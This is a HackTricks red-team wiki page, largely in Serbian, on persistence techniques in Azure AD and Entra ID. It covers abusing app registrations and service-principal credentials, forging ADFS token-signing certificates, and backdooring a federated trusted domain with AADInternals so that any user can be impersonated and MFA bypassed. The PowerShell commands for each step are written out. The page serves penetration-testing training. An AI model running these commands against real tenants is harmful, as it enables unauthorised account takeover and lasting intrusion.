Az - Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Podrazumevano, svaki korisnik može registrovati aplikaciju u Azure AD. Tako možete registrovati aplikaciju (samo za ciljni tenant) koja zahteva visoke dozvole sa admin pristankom (odobrite je ako ste admin) - kao što je slanje maila u ime korisnika, upravljanje rolama itd. Ovo će nam omogućiti da izvršimo phishing napade koji bi bili veoma plodonosni u slučaju uspeha.

Štaviše, mogli biste takođe prihvatiti tu aplikaciju sa vašim korisnikom kao način da zadržite pristup.

Applications and Service Principals

Sa privilegijama Administratora aplikacija, GA ili prilagođenom ulogom sa microsoft.directory/applications/credentials/update dozvolama, možemo dodati kredencijale (tajni ključ ili sertifikat) postojećoj aplikaciji.

Moguće je ciljati aplikaciju sa visokim dozvolama ili dodati novu aplikaciju sa visokim dozvolama.

Zanimljiva uloga koju bi trebalo dodati aplikaciji bila bi Uloga administratora privilegovanih autentifikacija jer omogućava resetovanje lozinke Globalnim Administratorima.

Ova tehnika takođe omogućava obići MFA.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
  • Za autentifikaciju zasnovanu na sertifikatima

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Federacija - Sertifikat za potpisivanje tokena

Sa DA privilegijama na lokalnom AD-u, moguće je kreirati i uvesti nove sertifikate za potpisivanje tokena i sertifikate za dekriptovanje tokena koji imaju veoma dugu validnost. Ovo će nam omogućiti da se prijavimo kao bilo koji korisnik čiji ImuutableID poznajemo.

Pokrenite sledeću komandu kao DA na ADFS serveru(ima) da kreirate nove sertifikate (podrazumevani lozinka 'AADInternals'), dodajte ih u ADFS, onemogućite automatsko obnavljanje i restartujte servis:

New-AADIntADFSSelfSignedCertificates

Zatim, ažurirajte informacije o sertifikatu sa Azure AD:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Federation - Trusted Domain

Sa GA privilegijama na tenant-u, moguće je dodati novu domenu (mora biti verifikovana), konfigurisati njen tip autentifikacije na Federated i konfigurisati domenu da veruje određenom sertifikatu (any.sts u donjoj komandi) i izdavaču:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

References

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks

Last updated